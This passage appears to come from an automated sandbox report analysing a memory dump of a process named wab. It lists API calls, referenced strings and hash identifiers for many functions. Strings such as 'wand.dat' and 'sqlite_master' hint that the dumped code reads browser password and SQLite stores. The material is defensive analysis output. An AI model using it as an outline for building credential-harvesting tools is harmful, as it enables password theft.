                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                    • String ID:
                                    • API String ID: 1661045500-0
                                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                    APIs
                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                    • memcpy.MSVCRT ref: 0042EC7A
                                    Strings
                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpymemset
                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                    • API String ID: 1297977491-2063813899
                                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                    APIs
                                    • memset.MSVCRT ref: 0040560C
                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                    • String ID: *.*$dat$wand.dat
                                    • API String ID: 2618321458-1828844352
                                    • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                    • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                    APIs
                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                    • wcslen.MSVCRT ref: 00410C74
                                    • _wtoi.MSVCRT ref: 00410C80
                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                    • String ID:
                                    • API String ID: 1549203181-0
                                    • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                    • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                    APIs
                                    • memset.MSVCRT ref: 00412057
                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                    • String ID:
                                    • API String ID: 3550944819-0
                                    • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                    • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                    APIs
                                    • wcslen.MSVCRT ref: 0040A8E2
                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                    • memcpy.MSVCRT ref: 0040A94F
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@$memcpy$mallocwcslen
                                    • String ID:
                                    • API String ID: 3023356884-0
                                    • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                    • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                    APIs
                                    • wcslen.MSVCRT ref: 0040B1DE
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                    • memcpy.MSVCRT ref: 0040B248
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@$memcpy$mallocwcslen
                                    • String ID:
                                    • API String ID: 3023356884-0
                                    • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                    • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID: @
                                    • API String ID: 3510742995-2766056989
                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@??3@memcpymemset
                                    • String ID:
                                    • API String ID: 1865533344-0
                                    • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                    • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                    APIs
                                    • strlen.MSVCRT ref: 0040B0D8
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                    • memcpy.MSVCRT ref: 0040B159
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@$memcpy$mallocstrlen
                                    • String ID:
                                    • API String ID: 1171893557-0
                                    • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                    • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                    APIs
                                    • memset.MSVCRT ref: 004144E7
                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                      • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                    • memset.MSVCRT ref: 0041451A
                                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                    • String ID:
                                    • API String ID: 1127616056-0
                                    • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                    • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy$memset
                                    • String ID: sqlite_master
                                    • API String ID: 438689982-3163232059
                                    • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                    • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                    APIs
                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                    • wcscpy.MSVCRT ref: 00414DF3
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                    • String ID:
                                    • API String ID: 3917621476-0
                                    • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                    • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                    APIs
                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                    • _snwprintf.MSVCRT ref: 00410FE1
                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                    • _snwprintf.MSVCRT ref: 0041100C
                                    • wcscat.MSVCRT ref: 0041101F
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                    • String ID:
                                    • API String ID: 822687973-0
                                    • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                    • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                    APIs
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                    • malloc.MSVCRT ref: 00417459
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$??3@malloc
                                    • String ID:
                                    • API String ID: 4284152360-0
                                    • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                    • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                    • RegisterClassW.USER32(?), ref: 00412428
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                    • String ID:
                                    • API String ID: 2678498856-0
                                    • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                    • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                    APIs
                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: MessageSend$Item
                                    • String ID:
                                    • API String ID: 3888421826-0
                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                    APIs
                                    • memset.MSVCRT ref: 00417B7B
                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                    • GetLastError.KERNEL32 ref: 00417BB5
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: File$ErrorLastLockUnlockmemset
                                    • String ID:
                                    • API String ID: 3727323765-0
                                    • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                    • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                    • malloc.MSVCRT ref: 00417407
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                    • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$??3@malloc
                                    • String ID:
                                    • API String ID: 4284152360-0
                                    • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                    • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                    APIs
                                    • memset.MSVCRT ref: 0040F673
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                    • strlen.MSVCRT ref: 0040F6A2
                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                    • String ID:
                                    • API String ID: 2754987064-0
                                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                    APIs
                                    • memset.MSVCRT ref: 0040F6E2
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                    • strlen.MSVCRT ref: 0040F70D
                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                    • String ID:
                                    • API String ID: 2754987064-0
                                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                    APIs
                                    • memset.MSVCRT ref: 00402FD7
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                    • strlen.MSVCRT ref: 00403006
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                    • String ID:
                                    • API String ID: 2754987064-0
                                    • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                    • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                    APIs
                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                    • String ID:
                                    • API String ID: 764393265-0
                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                    APIs
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Time$System$File$LocalSpecific
                                    • String ID:
                                    • API String ID: 979780441-0
                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                    APIs
                                    • memcpy.MSVCRT ref: 004134E0
                                    • memcpy.MSVCRT ref: 004134F2
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                    Memory Dump Source
